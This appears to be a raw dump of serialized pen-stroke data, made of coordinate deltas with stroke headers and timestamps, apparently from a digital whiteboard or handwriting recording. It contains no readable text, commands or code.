0 1,17 0-16,-17 0 15,-1 0 1,1 0 0,0 0-16,-1 0 15,1 0 17,0 0-17,17 0-15,0 0 16,0 0-16,1 0 15,-19 0-15,19 0 16,-19 0-16,1 0 16,-1 0-1,1 0 32,0 0 156,17 0-203,0 0 16,18 0-16,-17 0 16,16 0-16,1 0 15,-17 0-15,-1 0 16,0 0-16,-17 0 15,-1 0-15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2:05.0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772 11677 0,'-18'0'16,"1"0"-1,-1 0-15,0 0 16,1 18-16,-19-18 16,1 0-16,0 0 15,0 0-15,-18 0 16,0 0-16,-18 0 16,-17 0-16,-18 0 15,-35 0-15,0 0 16,0 0-16,-53-18 15,-18 0 1,1 1-16,-1 17 0,0 0 16,36 0-16,-36 0 15,18 0-15,-18 0 16,36 0-16,-36 0 16,18 0-1,0 0-15,-17 0 16,52 0-16,0 0 15,18 0-15,35 0 16,36 0-16,34 0 16,19 0-16,-19 0 15,19 0 1,-18 0-16,-1 0 16,1 0-16,-36 0 15,19-18-15,-19 18 16,0-18-16,-17 1 15,18-1-15,-1 0 16,-17 18-16,35 0 16,0 0-16,18-17 15,-36-1-15,36 18 16,-36-17-16,36 17 16,-18 0-1,18 0-15,17 0 0,-17-18 16,17 18-1,1 0 1,-19 0 15,1 0-31,-18 0 16,0 0-16,0 0 16,-17 0-16,35 0 15,-18 0-15,0 0 31,35 0-31,0 0 16,1 0 15,-1 0-15,1 0 15,-1 0-31,0 18 47,-17-18-31,17 0-16,1 0 15,-19 0-15,-16 0 16,16 0 0,1 0-16,-18 0 15,0 17-15,0-17 16,0 18-16,0-1 15,1-17-15,34 0 16,-17 18-16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2:54.1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175 14499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2:57.2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74 14323 0,'35'0'63,"0"0"-48,36 17-15,17-17 0,-35 0 16,35 0-1,-17 0-15,-1 0 16,1 0-16,0 0 16,34 0-16,-34 0 15,-1 0-15,1 0 16,0 0-16,-1 0 16,1 0-16,35 0 15,17 0-15,0 36 16,36-19-16,0 1 15,0 17-15,-53-35 16,-18 18-16,-18 0 16,-52-18-16,17 0 15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2:59.9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63 15152 0,'-18'0'141,"1"0"-126,-1 0 1,0 0-1,1 0 1,-1 0-16,1 0 16,-19 0-1,19 0 1,-1 0-16,-17 0 16,17 0-1,-17 0 1,17 0 15,1 0 0,-1 0 63,0 0-31,-17 0-32,17 0-16,1 0-15,-1 0 16,0 0 0,1 0-1,-1 0 1,1 0 15,-1 0 17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43.8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65 2123,'0'0,"18"0,-18-18,19 18,-1 0,-18-19,18 19,18 0,19 0,-1 0,37 0,36-18,36 0,37 18,17-18,1-18,36 36,36 0,128 18,35-18,37 0,54 0,1 0,35 0,-36 0,1 0,17 18,-18 18,-199-36,109 37,36 71,-146-108,92 55,-37-37,-91 0,-36-18,19 0,-74 0,1 0,-36 0,-1 0,-18 0,-36 0,-72 0,-1 0,-36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02.1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03 15187 0,'18'0'94,"-1"0"-78,36 0-16,-17 0 15,-1 0-15,0 0 16,1 0-16,16 0 16,-16 0-16,-1 0 15,18 18-15,35-1 32,-70-17-32,35 0 15,-18 18-15,18-18 16,0 0-16,0 0 15,-18 0-15,0 18 16,1-18-16,-19 17 16,18-17-16,-17 0 15,0 0-15,-1 18 16,1-18 15,0 0-31,-1 18 16,1-18-16,17 0 15,0 0-15,1 0 16,-1 0-16,-17 0 16,-1 17-16,1-17 47,0 18-32,-1-18 1,18 0-1,1 0-15,-1 0 16,-17-18-16,17 18 16,0-17-1,1 17 1,-19 0-16,18 0 16,-17 0-1,17 0-15,1 0 16,-1 0-16,0 0 15,0 0-15,1 0 16,-1 0-16,-17 0 16,17 0-16,-17 0 15,-1 0 1,1 0 0,-1 0-16,1 0 15,0 0 1,-1 0-16,19 0 15,-19 0-15,19 0 16,-19 0-16,19-18 16,-1 18-16,0 0 31,-17 0-31,17 0 16,-17-18 15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9:21.5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63 1097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9:23.8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95 11659 0,'0'0'0,"-53"0"0,18-17 15,0-1-15,-18 18 16,18 0 0,-1 0-16,1 0 0,17 0 15,-35 0-15,18 0 16,0 0 0,-18 0-16,0 0 15,18 0-15,-18 0 16,0 0-16,0 0 15,0 0-15,0 0 16,-53 0 0,36 0-16,-1 0 15,-35 0-15,36 0 16,-36 0-16,0 0 16,18 0-16,-18 18 15,0-18-15,1 0 16,-54 53-16,71-53 15,-71 0-15,-18 35 16,19-17-16,-36 17 16,-141-18-1,193-17 1,-34 18-16,17-18 0,18 0 16,0 0-16,0 0 15,-18 0-15,18 0 16,-35 0-16,35 0 15,35 0-15,0 0 16,35 0 0,18 0-16,1 0 0,-1-18 15,0 1 1,0-1-16,0 1 16,0-1-16,18-17 15,-18 17-15,18 18 16,-18-18-16,0 1 15,-18-1-15,36 18 16,-36-18-16,18 18 16,18-17-16,0 17 15,0 0-15,-1-18 16,1 18-16,17 0 16,1 0-16,-1 0 15,-17 0-15,0-18 16,-18 18-16,0-17 15,17 17-15,1 0 16,0 0-16,0-18 16,-18 1-16,17 17 15,19-18-15,-19 18 16,-16-18 0,34 18-16,-17 0 0,17 0 15,0 0-15,1-17 16,-1 17-1,0 0 1,1 0-16,-1 0 16,-17 0-16,0 0 15,-18 0-15,35 0 16,-35 0 0,18 17-16,0-17 15,17 0-15,-17 0 16,17 0-16,-17 18 15,17-18-15,0 0 16,1 0-16,-1 18 16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9:25.0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404 10901 0,'36'0'156,"34"0"-156,54 17 16,17-17-16,35 18 16,-17 0-1,0-18-15,17 0 0,-17 0 16,-18 0-16,-18 0 15,-17 0 1,0 0-16,-35 0 16,-19 0-16,19 0 15,0 0-15,-1 0 16,36 0-16,-18 0 16,0 0-16,36 0 15,-18 0-15,0 0 16,17 0-16,-52 0 15,34 17-15,-34-17 16,-18 18-16,0 0 16,-18-18-16,0 0 15,1 0 1,-1 0-16,-17 17 16,-1-17-1,18 0 1,-17 0-16,17 0 0,1 18 15,17-18-15,-18 0 16,0 0-16,-17 0 16,17 18-16,-17-18 15,-1 0 17,19 0-1,-1 0-31,18 0 15,53 17-15,17 18 16,1-17-16,-19 0 16,1-1-16,-18-17 15,1 0-15,-19 0 16,-35 0-16,1 0 16,-19 0-16,1 0 15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11.395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7461 8008 0,'-17'0'0,"-1"0"16,0 0-1,-17 0 1,-18 0-16,18 0 16,-36 0-16,1 0 15,17 0-15,-35 0 16,-1 0-16,1 0 15,35 0-15,-35 0 16,-18 0-16,-123 0 31,106 0-31,-36 0 0,0 0 16,-35 0-16,-18 0 16,18 0-1,0 0-15,0 0 0,36 0 16,-37 0-16,37 0 15,17 0-15,-36 0 16,71 0-16,-17 0 16,-1 0-1,54 0-15,-1 0 16,18 0-16,-17 0 16,-1 0-16,18 0 15,-17 0-15,-36 0 16,35 0-16,1 0 15,-18 0-15,-18 0 16,35 0-16,18 0 16,0 0-16,18 0 15,0 0-15,17 0 16,-35 0-16,0-18 16,-35 1-16,0 17 15,0-18-15,0 1 16,-18 17-16,18-18 15,-18 18-15,35 0 16,1 0-16,17 0 16,-18 0-16,36 0 15,-18 0-15,18 0 16,17 0-16,-17 0 16,17 0-16,1 0 15,-19 0-15,1 0 16,17 0-16,1 0 31,-1 0-31,0 0 31,1 0 1,-18 0-17,17 0-15,0 0 16,1 0-1,-1 0 1,0 0 0,-17 0-1,17 18 1,1-18-16,-19 0 0,19 17 16,-1-17-16,1 18 15,-1-18-15,0 0 16,1 0-16,-19 17 15,19 1-15,-19-18 16,19 0-16,-36 0 31,35 0-31,1 0 0,-1 0 16,-17 18 0,17-18-16,0 0 15,-17 17 1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12.82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8643 8996 0,'-35'0'94,"-18"0"-94,-18 0 15,1 0-15,-54 35 16,1-35-16,-18 35 16,0-17-16,-36-18 15,1 0-15,-71 0 16,18 0-16,-1 0 16,1 0-16,-36 0 15,54 0-15,-19 0 16,19 0-16,52 0 15,-17 0 1,17 0-16,0 0 0,0 0 16,1 0-16,-19 0 15,18 0 1,-17 0-16,0 0 0,35 0 16,-53 0-16,52 0 15,-16 0 1,17 0-16,17 0 15,18 0-15,36 18 16,-1-1-16,1-17 16,17 18-16,0-18 15,0 18-15,0-18 16,-18 17-16,18-17 16,-35 0-16,0 0 15,-18 0-15,0 0 16,1 0-16,16 0 15,19 0-15,-1 0 16,18 0-16,18 0 16,17 0-16,1 0 15,-1 0-15,1 0 16,-1 18-16,0-18 16,1 0-1,-1 0 1,-35 0-16,35 0 0,-17 0 15,0 0-15,-36-35 16,-17-1-16,0-17 16,17 18-16,-17 0 31,70 0-31,-34 35 16,-1-18-16,-36-17 15,19 17-15,35 0 16,-18 18-16,-35-35 15,52 35-15,-17-18 16,0-17-16,1 35 16,34-17-16,0-1 15,1 18 1,-1 0 93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21.46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094 10830 0,'0'0'0,"17"0"94,1 0-94,17 0 15,0 0-15,18 0 16,18 0-16,-1 0 16,19 0-16,-19 0 15,1 18-15,-18 0 16,17-1-16,-17-17 15,18 0-15,-18 18 16,0-18-16,-1 17 16,1-17-16,18 18 15,-1 0-15,36-18 16,0 17 0,0-17-16,-18 0 15,36 18-15,-18-18 16,-1 0-16,-52 0 15,18 18-15,-36-18 16,0 0-16,1 0 16,-1 0-1,-17 0-15,-1 0 16,1 0-16,35 0 16,-18 0-16,0 0 15,18 0-15,35 0 16,-17 0-16,35 0 15,-18 0-15,0 0 16,18 0-16,-35 0 16,17 0-16,-18 0 15,-17 0-15,53 0 16,-35 0-16,-36 0 16,0-18-16,18 0 15,0 18-15,0-17 16,35 17-16,-17-18 15,-1 18-15,1 0 16,35-18-16,-18 18 16,0-17-16,36-1 15,-36 1-15,35 17 16,-17-18-16,-35 18 16,-1 18-1,18-1-15,-17-17 16,-1 0-16,-17 0 15,0 18-15,18-1 16,-18-17-16,0 0 16,0 18-16,-1-18 15,1 0-15,-17 0 16,34 0-16,-17 0 16,0 0-16,35 0 31,-35 0-31,0 0 0,-18 0 15,18 0-15,-17 0 16,16 0-16,1 0 16,0 0-16,-17 0 15,-1 0-15,18 0 16,-18 0-16,18 0 16,0 18-16,-18-18 15,18 0-15,-18 0 16,18 17-16,-17-17 15,-19 0 1,18 18-16,1-18 0,-19 0 16,19 0-1,17 0-15,-18 18 16,35-1-16,-34-17 16,34 0-16,1 18 15,35-18-15,-18 18 16,18-1-16,-36-17 15,36 0-15,-18 0 16,0 0-16,-17 0 16,17 0-16,-17 18 15,-18-18-15,53 17 16,-54-17-16,19 18 16,17-18-16,36 0 15,-36 0-15,0 18 16,0-18-16,18 0 15,-18 0-15,-17 0 16,-1 0-16,1 0 16,-36 0-16,18 0 15,0 0-15,0 17 16,-35-17-16,17 0 16,0 0-16,-17 0 15,17 0 1,0 0-16,-17 0 0,35 0 15,-18 0 1,36 0-16,-1 0 16,36 0-16,-18 0 15,-17 0-15,35 0 16,-18 0-16,-18 0 16,54 0-16,-1 0 15,1 0-15,17 0 16,0 0-16,0 0 15,-35 0-15,212 0 32,-177 0-32,17 0 0,-16 0 15,-1 0-15,0 0 16,-18 0-16,-35 0 16,36 0-16,17 0 31,-70 0-31,-19 0 0,1 0 15,-17 0-15,17 0 16,-36 0 0,18 0-16,-17 0 31,0 0-15,-1 0-1,1 0-15,0 0 16,-1 0-16,1 0 15,0 0-15,-1 0 16,-17-17 156,18 17-156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31.013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164 11818 0,'0'0'0,"0"18"31,0-1-15,0 1 15,18 0-15,-1-18-1,36 0-15,-17 0 0,17 0 16,-1 0-1,-16 0-15,17 0 16,0 0-16,17 0 16,-17 0-16,18 0 15,17 0-15,35 0 16,1 0-16,52 0 16,18 0-16,0 0 15,36 0-15,-19 0 16,18 0-16,1 0 15,-19 0-15,19 0 16,-19 0-16,1 0 16,-53 0-16,17 0 15,-35 0-15,0 0 16,1 0-16,-19 0 16,18 0-16,18 0 15,-18 0-15,18 0 16,35 0-16,-35 0 15,52 0-15,1 0 16,0 0-16,52 0 16,-35 0-16,89 0 15,70 0 1,-53 0-16,141 0 16,-211 0-16,-53 0 15,-36 0-15,-53 0 16,1 0-16,-36 0 15,18 0-15,0 0 16,17 0-16,71 0 16,-35 0-16,53 0 15,17 0-15,-17 0 16,-1 0-16,1 0 16,0 0-16,-36 0 15,36 0-15,-18 0 16,-35 0-16,158 0 31,-158 0-31,-18 0 0,0 0 16,18 0-16,-18 0 15,35 0-15,-35 0 16,18 0-16,-18 0 16,0 0-16,0 0 15,-17 0-15,17 0 16,-18 0-1,19 0-15,-1 0 16,17 17-16,19 1 16,-36 0-16,18 17 15,-36-35-15,1 35 16,-1-35-16,1 18 16,-36-1-16,18 1 15,-36-18-15,36 0 16,-18 0-16,36 0 15,17 0-15,0 0 16,35 0-16,18 35 16,0 1-16,0 34 15,-35-52-15,-106-18 16,-18 0-16,-17 0 62,0 0 17,-1-18-64,-34 0 126,-1 1-126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49:38.0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93 2928 0,'-18'0'31,"-35"88"-31,0-17 16,-17 35-16,-1 70 16,-35-17-16,-17 17 15,17 18-15,36-17 16,-36 34-16,53 1 15,0-36-15,18-52 16,-1-54-16,36-17 16,0-35-1,0 0 1,18 34-16,70 1 16,53 0-16,71 35 15,70 36-15,142 52 16,-1-35-16,53-35 15,0 35-15,-193-88 16,87-17 0,-299-36-16,-18 0 15,-18 0-15,-35-18 16,17 0-16,-17-17 16,0 0-16,0-18 15,-17-53-15,-36 0 16,-35-53-16,-89-88 15,-34 1-15,-89-107 16,-423-459 0,229 371-16,53 89 15,53 69-15,35 19 16,71 87-16,105 72 16,36 34-16,53 18 15,53 35-15,17 1 16,0 17-16,18 53 31,0 70-15,0 36-16,89 88 15,-1 141-15,35-35 16,-52-124-16,-18 18 16,-18-35-16,18-36 15,-35 18-15,17 18 16,-17-36-16,-18 1 15,35-1-15,-18-17 16,19 17-16,-1-52 16,0-1-16,1-17 15,-1-36-15,0 1 16,-35-53-16,18-1 16,17-34 46,-35-1-46,35-35-16,18-53 0,0 18 15,35-35 1,-35-36-16,35-53 16,-35 0-16,0-35 15,18-17-15,-54-36 16,-17-35-16,0 35 15,0 53-15,0-53 16,0-35-16,0 53 16,0 35-16,0 88 15,18 71-15,0 70 16,-1 18 0,19 0-16,-1 0 31,-17 0-31,-18 18 31,0 0-15,0-1-16,0 1 15,17-18-15,-17 18 16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3:43.9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93 1393 0,'0'0'0,"-53"36"0,-18-1 16,-17 18-16,-18 18 16,0-19-16,-17 19 15,-1 35-15,-34 0 16,-19 35-16,36-18 16,0 36-16,-18 0 15,54-53-15,-1-1 16,70-16-16,1-36 15,18-1 1,17 1-16,0 0 16,0-35-16,0 0 15,0-1-15,70 1 32,1 17-32,52 0 0,54 1 15,17 17-15,17-18 16,54 18-16,-1-18 15,54 18-15,-1-18 16,-17-17-16,-18 35 16,-105-18-16,-1-17 15,-105-18-15,-54 0 16,1 0 15,-18-36-15,-53-17-1,-17-52-15,-19-19 0,1 1 16,-53-54-16,0 1 16,-18 17-16,-52-88 15,-19 36 1,1-19-16,0 1 16,52 53-16,1 34 15,52 19-15,1-18 16,35 53-16,17-18 15,54 71-15,-1 35 16,18-18-16,-35 53 31,35 53-15,-18 54-16,0-1 16,-17 70-16,0 19 15,17 69-15,1 107 16,17-71-16,0-88 15,0 18-15,0-36 16,35 36-16,0-36 16,0 18-16,36-53 15,-18-35-15,0-18 16,-18-71-16,0 1 16,-17-53-16,0-1 15,-18-52 79,0-36-78,17-34-16,1-19 15,17 1-15,-35 17 16,35-53-16,1 18 15,17-53-15,-1 0 16,37 0-16,69-300 31,-34 194-31,-71 18 0,53-53 16,-53 141-16,0 17 16,-18 36-16,0 18 15,-17 52-15,-18 18 16,17 0-16,-17 36 15,0-1 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48.7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94 4427,'0'0,"18"0,0 0,1 0,17 0,0 0,55 0,18 0,36 0,18 18,-18-18,-36 0,18 0,-54 0,36 0,-19 0,1 0,-37 0,-35 0,-1 0,0 0,0 0,0 0,18 0,-17 0,-1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28.4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57 4445 0,'-18'0'46,"0"0"-46,1 0 16,-19 18-16,-34-18 16,17 0-16,0 17 15,-17-17-15,17 0 16,-18 18-16,36-18 16,0 18-16,-1-18 15,1 0-15,-18 0 16,0 17-16,0-17 15,0 18-15,-17-18 16,17 17-16,-18-17 16,18 0-16,-17 0 15,17 0-15,0 0 16,18 0-16,17 0 16,-35 0-16,35 0 15,1 0-15,-1 0 16,1 0-16,-1 0 15,0 0 1,1 0 47,-1 0-48,0 0-15,-17 0 16,17 0-16,-17 0 15,0 0-15,-18 0 16,-53 0 31,89 0-47,-1 0 0,-17 0 16,17 0-16,-17 0 15,-1 0 1,1 0-1,17 0-15,-17 0 0,0 0 16,17 0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39.00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90 4463 0,'18'0'15,"17"17"1,0 1-16,18-18 16,18 0-1,-18 0-15,17 18 0,18-1 16,-17-17-16,-18 18 16,0-1-16,17-17 15,-17 0-15,0 0 16,0 0-16,-18 0 15,18 0-15,-17 0 16,-19 0-16,1 0 16,0 0-1,-1 0-15,1 0 16,17 0-16,-17 0 16,-1 0-16,1 0 15,0 0-15,-1 0 16,1 0-1,0 0 1,-1 0-16,18-17 16,-17 17-16,17 0 15,1 0-15,-19-18 16,36 18-16,-35 0 16,0 0-16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40.5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48 4427 0,'18'-17'78,"-1"17"-78,18 0 16,1 0-16,34 0 16,36 0-16,0 0 15,35 0-15,35 0 16,-34 0-16,16 17 15,19 1-15,-19 0 16,19-1-16,-18 19 16,35-1-16,-4110-18 15,8202 1-15,-4092-18 16,-18 18-16,-70-1 16,18 1-1,-18-18-15,-36 0 0,1 0 16,-18 0-16,-18 0 15,-17 0 1,-1 0-16,1 0 0,-1 0 31,1 0-31,0 0 16,-1 0-16,1 0 0,0 0 16,17 0-1,-17 0-15,17 0 16,-17 0-16,17 0 15,0 0-15,0 0 16,18 0-16,-35 0 16,17 0-16,0 0 15,-17 0-15,17 0 16,-17 0-16,17 0 16,-17-18-16,0 18 15,-1 0-15,-17-17 16,18 17-16,-1 0 15,1 0 1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45.7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62 5750 0,'17'0'110,"1"0"-64,0 0 1,-1 0-15,1 0-17,0 0 1,-1 0-1,1 0-15,17 0 16,-17 0-16,52 0 16,1 18-16,-1-18 15,19 18-15,-1-1 16,-53-17-16,36 0 16,-36 18-1,18-18-15,0 17 0,-36-17 16,36 18-1,-35-18-15,0 0 16,-1 0 156,18 0-156,-17 0-1,17 0-15,1 0 16,34 0-16,54 0 15,-36 0-15,35 0 16,1 0-16,-36 0 16,35 0-16,-34 0 15,-1 0-15,-35-18 16,0 18 0,0 0-16,-36 0 15,36 0-15,-35 0 16,35 0-16,-36 0 15,54-17-15,-18-1 16,0 18-16,-18 0 16,18 0-16,-18 0 15,1 0-15,-1 0 16,18 0-16,-36 0 16,19 0-16,-19 0 15,1 0-15,17 0 16,-17 0-16,-1 0 15,19 0-15,-1 0 16,0 0-16,36 0 16,-1 0-16,-17 0 15,0 0-15,0 0 16,0 0-16,-18 0 16,18 0-16,0 0 15,18 0-15,-1 0 16,1 0-16,-1 0 15,19 0-15,34 0 16,-52 0 0,34 0-16,1 0 15,0 0-15,-18 0 16,18 0-16,-35 0 16,-1 0-16,18 0 15,18 0-15,-18-17 16,89-1-1,-71 18-15,-36 0 16,1 0-16,-1 0 16,1 0-1,-1 0-15,36 0 0,-18 0 16,1 0-16,17 0 16,17 0-16,-17 0 15,0 0 1,-18 0-16,-18 0 0,36 0 15,-35 0 1,-18 0-16,17 0 16,1 0-16,-18 0 15,0 0-15,-18 0 0,0 0 16,18 0 0,0 0-16,18 0 15,34 0-15,-34 0 0,17 0 16,36 0-1,-1 0-15,-35 0 16,1 0-16,16 0 16,-34 0-16,-1 0 15,-17 0-15,18 0 16,-36 0-16,36 0 16,35 0-16,-18 0 15,-18 0-15,1 0 16,-1 0-16,19 0 15,-54 0-15,0 0 16,1 0-16,-1 0 16,-18 0-16,36 0 15,-35 0-15,17 0 16,1 0-16,-1 0 16,0 0-16,18 0 15,-18 0-15,36-18 16,-54 18-16,19-17 15,-1 17-15,0 0 16,1 0-16,-19 0 16,18-18-16,-17 18 15,35 0-15,-18 0 16,1 0-16,-1 0 16,18 0-1,-18 0-15,0 0 16,1 0-16,-1 0 15,0 0-15,0 0 16,36 0-16,0 0 16,17 18-16,88 17 31,-88-35-31,-17 18 0,17-1 16,-17-17-16,-36 0 15,0 0-15,0 0 16,-17 0-16,0 0 15,17 0 17,-17 18-17,-1-18-15,19 0 0,-1 17 16,0 1 0,-17-18-16,17 0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48.0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562 5874 0,'0'0'0,"17"0"16,18 0-16,18 17 16,18 1-16,17-18 15,18 18 1,17-1-16,1 1 0,17 0 15,35-1-15,-17-17 16,18 18 0,-19-18-16,-17 0 15,0 0-15,-17 0 16,-36 17-16,0-17 16,1 0-16,-37 0 15,19 18-15,-36-18 16,18 18-16,-17-18 15,-1 0-15,-18 0 16,1 0-16,0 0 16,17 0-1,0 0 1,1 0-16,-1 0 16,0 0-16,18 0 15,0 0-15,-18 0 16,18 17-16,18-17 15,-18 18-15,-18-18 16,35 0-16,-52 0 16,0 18-16,-1-18 15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4:49.6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44 7426 0,'-70'0'62,"-36"-18"-46,0 1-16,-88-1 16,0-17-16,-18 17 15,-17-17-15,0 0 16,-1 35-16,19 0 16,34 0-16,1 0 15,70 0-15,36 0 16,34 0-16,19 0 47,-1 0-47,0 0 15,-35 0-15,36 0 16,-18 0-16,-1 0 16,1 0-16,17 0 15,1 0-15,-1 0 16,0 0-1,-17 0 1,18 17 0,-19-17-16,19 0 15,-36 0 1,35 0-16,0 18 16,-17-18-16,18 17 0,-1-17 15,0 0 1,1 18-1,-1-18 1,0 18 0,1-1-16,-1 1 15,0-18 204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10.0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483 1958 0,'0'-18'16,"18"18"0,-1 0-16,18-17 15,18-1-15,0 18 16,0-18-16,53 18 15,194 0 17,-194 0-32,35 0 0,0 0 15,-35 0 1,0 18-16,-53-18 16,-1 0-16,-34 0 15,17 0-15,-17 0 16,0 0-1,-1 0-15,19 0 16,-1-18-16,-17 18 16,17 0-16,18-17 15,-36 17-15,19 0 16,-19-18-16,1 18 16,0 0-16,-1 0 15,1 0 1,-1 0 31,1 0-32,0 0-15,-1 0 16,19 0 0,-1 0-16,0 0 15,0 0-15,-17 0 16,0 0-16,-1 0 47,1 0-47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11.7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13 4498 0,'17'-18'172,"19"1"-156,-1 17-16,18 0 16,0 0-16,-18 0 15,18 0-15,-18 0 16,18 0-16,0 0 15,-18 0 1,18 0-16,0 0 16,-18 0-16,-17 0 15,17 0-15,-17 0 16,0 0-16,-1 0 31,1 0 125,-1-18-156,1 18 0,17 0 16,1 0 0,17 0-16,-18 0 0,18 0 15,35 0 1,0 0-16,-17 0 16,17 0-16,0 0 15,-35 0-15,0 0 16,0 0-16,-18 0 15,0 0-15,18 0 16,-17 0-16,17 0 16,-1 0-16,19 0 15,35 0-15,-36 0 16,1 0-16,17 0 16,18 0-16,35 0 15,-17 0-15,-19 0 16,54 18-16,-71-1 15,36 1-15,-18-18 16,-36 18-16,-17-18 16,18 0-16,-18 0 15,-18 0-15,18 0 16,-18 0-16,0 0 16,1 0-16,-1 0 15,0 0-15,0 17 16,-17-17-16,17 18 15,1-1-15,17-17 16,-36 0 0,1 0-16,-1 18 62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30.4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112 1852 0,'18'0'78,"0"0"-78,-1-18 16,19 18-1,-1 0-15,18 0 0,17-17 16,1 17-16,35 0 15,17 0 1,-17 0-16,18 0 0,-36 0 16,18 0-16,-53 0 15,17 0 1,-17 0-16,-18 0 16,18 0-16,0 0 15,0 0-15,0 17 16,0-17-16,0 18 15,0-18-15,0 0 16,0 0-16,-18 18 16,18-18-16,0 0 15,-18 0-15,36 0 16,-19 0-16,19 0 16,0 0-16,-1 17 15,18 1-15,-35-18 16,-18 0-16,1 0 15,-19 0-15,19 0 16,-19 0 0,1 0 15,0 0-15,-1 0-1,1 0-15,-1 0 16,1 0 31,0 0-32,-1 0-15,1 0 16,0 0 0,-1 18-16,1-18 15,0 0 1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32.6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472 4410 0,'18'0'203,"-1"0"-187,19 0-16,-1-18 15,18 18-15,0 0 16,0 0-16,35 0 15,-35 0-15,17 0 16,19 0-16,-19 0 16,18 0-16,-35 0 15,18 0-15,-36 0 16,18 0-16,70 0 16,-52 0-1,-18 0-15,17 0 16,-17 0-16,0-18 15,0 18-15,-35-17 16,-1 17-16,19 0 16,-19-18-1,19 1 1,-19 17-16,1 0 16,17-18-16,18 18 15,-18 0 1,18 0-16,18 0 15,211 0 1,-123 0-16,53 0 16,-18 35-16,17-17 15,19 35-15,-19-36 16,177 36 0,-264-35-16,-54 0 15,-52-18-15,0 0 16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49.4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71 4445,'18'0,"18"0,1 0,35 0,19 0,18 0,36 0,-36 0,18 0,-18 0,-37 0,1 0,-37-18,0 18,1 0,-1 0,-18 0,0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49.8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28 7391 0,'18'17'47,"-36"-17"0,0 18-32,1-18 1,-1 0-16,1 0 15,-1 0-15,-17 18 16,17-18-16,-35 0 16,18 17-16,-1-17 15,-16 0-15,-1 18 16,0-18-16,-18 0 16,18 18-16,18-18 15,0 0-15,17 17 16,0-17-16,1 0 15,-1 0-15,0 0 16,1 0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53.9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79 7479 0,'0'-18'141,"18"18"-141,0 0 15,17 0 1,0 0-1,18 0-15,-18 0 16,36 0-16,-18 0 16,70 18-16,1 0 15,-1-1-15,54 1 16,-71-1-16,70 1 16,-17-18-16,17 18 15,-35-18-15,-35 0 16,0 0-16,-53 0 15,-18 0-15,-17 0 32,-1 0-17,-34 0 204,-1 0-94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55.6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79 7426 0,'35'0'79,"18"0"-79,-18 0 15,18 0-15,0 0 16,18 0-16,17 0 15,0 0-15,18 0 16,-18 0-16,-17 0 16,17 0-16,-35 0 15,-18 18-15,-17-18 16,-1 0-16,19 0 16,-19 0-16,54 0 15,-18 0-15,17 0 16,-17 0-16,-18 0 15,-17 0-15,17 0 16,-17 0 0,0 0-16,17 0 0,35 0 15,1 0-15,0 0 16,17 0-16,-35 0 16,105 0 15,-105 0-31,18 0 15,-18 0-15,35 0 16,18 0-16,-18 0 16,18 0-16,-36 0 15,-17 0-15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57.7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635 7549 0,'53'0'62,"0"0"-46,17 0-16,18 0 16,-17 0-16,35 0 15,-36 0-15,1 0 16,0 0-16,-1 0 16,36-17-16,-36-1 15,36 1-15,18-1 16,-1 0-16,1 1 15,-18 17-15,17 0 16,18 0 0,0 0-16,0 0 15,0 0-15,1 0 16,-19 0-16,-35 0 16,36 0-16,-36 0 15,18 0-15,-18 0 16,18 0-16,88 0 15,-106 0 1,0 0-16,18 0 16,-18 0-16,-17 0 15,-1 0-15,18 0 16,-35 0-16,18 0 16,-18 0-16,17 0 15,1 0-15,0 0 16,-1 0-16,18 0 15,-17 0-15,17 0 16,0 0-16,106 0 31,-106 0-31,18 0 0,0 0 16,0 0-16,35 0 16,-17 0-16,-19 0 15,19 0-15,-1 0 16,18 0-1,-17 0-15,-36 0 16,0 0-16,36 0 16,-18 0-16,-36 0 15,1 0-15,-18 0 16,0 0-16,-18 0 16,0 0-16,-17 0 15,17 0-15,0 0 16,-17 0-16,17 0 15,-17 0-15,17 0 16,-17 0-16,-1 0 16,1 0 281,0 0-266,-1 0 0,1 0-15,0 0 15,-1 0-15,1 0 46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5:59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98 9578 0,'0'-18'32,"-17"18"-32,-19-17 15,19 17-15,-1 0 16,-17 0-16,0 0 15,-1 0-15,-17 0 16,0 0-16,1 0 16,-19 0-16,0 0 15,1 0-15,-36 0 16,18 0 0,0 0-16,-1 0 15,19 0-15,-1 0 16,18 0-16,18 0 15,0 0-15,0 0 16,-1 0-16,1 0 16,17 0-1,1 0 32,-19 0-31,19 0-1,87 0 204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00.8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09 9454 0,'17'0'94,"19"0"-94,17-17 15,52-18-15,-69 35 16,87-18-16,-35 18 15,1 0-15,16 0 16,19 0-16,-36 0 16,36 0-16,-72 0 15,19 0-15,-18 0 16,-35 0-16,-1 0 16,18 0-16,1 0 15,-1 0-15,18 0 16,18 0-16,-19 0 15,37 0-15,-19 0 16,-35 0-16,18 0 16,-17 0-16,-1 0 15,-17 0 1,-1 0-16,1 0 16,-1 0-1,19 0-15,-19 0 16,1 0-16,0 0 15,17 0 48,18 0-63,0 0 16,17 0-16,-17 0 15,18 18 1,-1-18-16,36 17 0,-18-17 15,36 0-15,52 0 16,1 18-16,17-18 16,-53 17-1,-35-17-15,-1 18 0,-69-18 16,-1 0-16,-17 0 16,-1 0 124,1 0-77,-18-18-48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88 9701 0,'35'0'125,"1"0"-109,17 0-16,0 0 16,0 0-16,-1 0 15,1 0-15,0 0 16,-17 0-16,16 0 15,1-17-15,-17 17 16,17 0-16,-18 0 16,0-18-16,18 18 15,0-18-15,-18 18 16,0-17-16,1 17 31,-1 0-31,-35-18 0,18 18 31,-1 0 16,1 0-31,17 0 0,1 18-16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04.4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81 12083 0,'0'0'0,"0"-18"0,-18 18 15,-17-18 1,17 18 15,0 0-15,1 0-16,-19 0 15,-16 0-15,-37 0 16,1 0-16,-35 0 16,-1 18-16,1-18 15,17 18-15,-194-18 31,212 0-31,17 0 16,-35 0-16,36 0 16,35 0-1,17 0-15,0 0 0,1 0 16,-1 0 15,0 0 0,-17 0-15,17 0 78,18-18-63,0 0 0,18 18-15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06.6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15 11977 0,'18'0'94,"52"0"-78,36 0-16,35 0 15,18 0 1,35 0-16,-18 0 16,36 0-16,-18 0 15,-35 0-15,-36 0 16,-35 0-16,0 0 16,-35 17-16,-17-17 15,-1 18-15,-17-18 16,-1 0-16,1 0 15,17 18-15,0-18 16,18 0 0,0 0-16,35 0 15,-35 0-15,36 0 16,-19 0-16,1 0 16,17-18-16,-18 0 15,19 1-15,-19 17 16,1-35-16,35 17 15,-18-17-15,106 17 32,-88 18-32,35 0 0,0 0 15,35 0-15,-17 0 16,-18 0-16,0 0 16,-17 0-1,-54 0-15,-17 0 16,-18 0-16,-17 0 15,0 0-15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10.4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04 13988 0,'-18'17'47,"1"-17"-16,-1 18-31,0-18 16,1 0 0,-1 0-16,1 18 0,-36-1 15,0 18-15,-35-35 16,-1 0-16,-17 18 16,-17 0-16,-177 